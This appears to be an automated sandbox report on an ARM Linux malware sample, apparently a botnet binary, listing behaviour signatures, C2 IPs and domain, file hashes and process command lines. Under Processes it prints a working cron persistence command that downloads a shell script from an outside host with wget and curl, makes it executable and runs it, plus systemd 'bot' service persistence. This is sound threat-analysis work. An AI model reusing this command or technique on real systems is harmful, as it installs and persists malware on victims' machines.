Malware Analysis Report

2024-11-30 18:26

Sample ID 241104-al64dsycnc
Target arm7-20241104-0018.elf
SHA256 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
Tags
defense_evasion discovery execution persistence privilege_escalatio privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681

Threat Level: Shows suspicious behavior

The file arm7-20241104-0018.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio privilege_escalation

Renames itself

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Modifies systemd

Creates/modifies Cron job

Changes its process name

Command and Scripting Interpreter: Unix Shell

Reads runtime system information

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 00:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 00:19

Reported

2024-11-04 00:21

Platform

debian9-armhf-20240611-en

Max time kernel

139s

Max time network

145s

Command Line

[/tmp/arm7-20241104-0018.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/arm7-20241104-0018.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 5.161.109.23 N/A N/A
Destination IP 139.84.165.176 N/A N/A
Destination IP 137.220.52.23 N/A N/A
Destination IP 152.53.15.127 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.vk0Due /usr/bin/crontab N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /lib/systemd/system/bot.service /tmp/arm7-20241104-0018.elf N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd /tmp/arm7-20241104-0018.elf N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/mounts /tmp/arm7-20241104-0018.elf N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A

Processes

/tmp/arm7-20241104-0018.elf

[/tmp/arm7-20241104-0018.elf]

/bin/sh

[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[/bin/sh -c /sbin/initctl start bot]

/sbin/initctl

[/sbin/initctl start bot]

/bin/sh

[/bin/sh -c /bin/systemctl enable bot]

/bin/systemctl

[/bin/systemctl enable bot]

Network

Country Destination Domain Proto
US 5.161.109.23:53 kingstonwikkerink.dyn udp
IN 139.84.165.176:53 kingstonwikkerink.dyn udp
CA 137.220.52.23:53 kingstonwikkerink.dyn udp
DE 152.53.15.127:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:21839 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.vk0Due

MD5 6834e3c196a6500f6580688b1dacc988
SHA1 195d34d068026784f01fd201c2a31452274b6326
SHA256 ab36c9cd44fe9af93990e477994623cac5cfa400abf79321d95c524a988ee8db
SHA512 622319261091b9218d24e9baea929a7008f3f5881d17ae1b1ff3f2669767b4c3a045e80c561a7b3dae9f6cf847e76029ab14a22c592b287e5988122481d7ac83

/etc/init/bot.conf

MD5 9722585f219a220a4dc2a0c49bd3b019
SHA1 ffba476658ea681147c570c6f2b16a79e7d38e19
SHA256 bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d
SHA512 77f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4

/lib/systemd/system/bot.service

MD5 a4e30f6ce6fb6cf00e133f3c93fb5449
SHA1 67b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256 a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25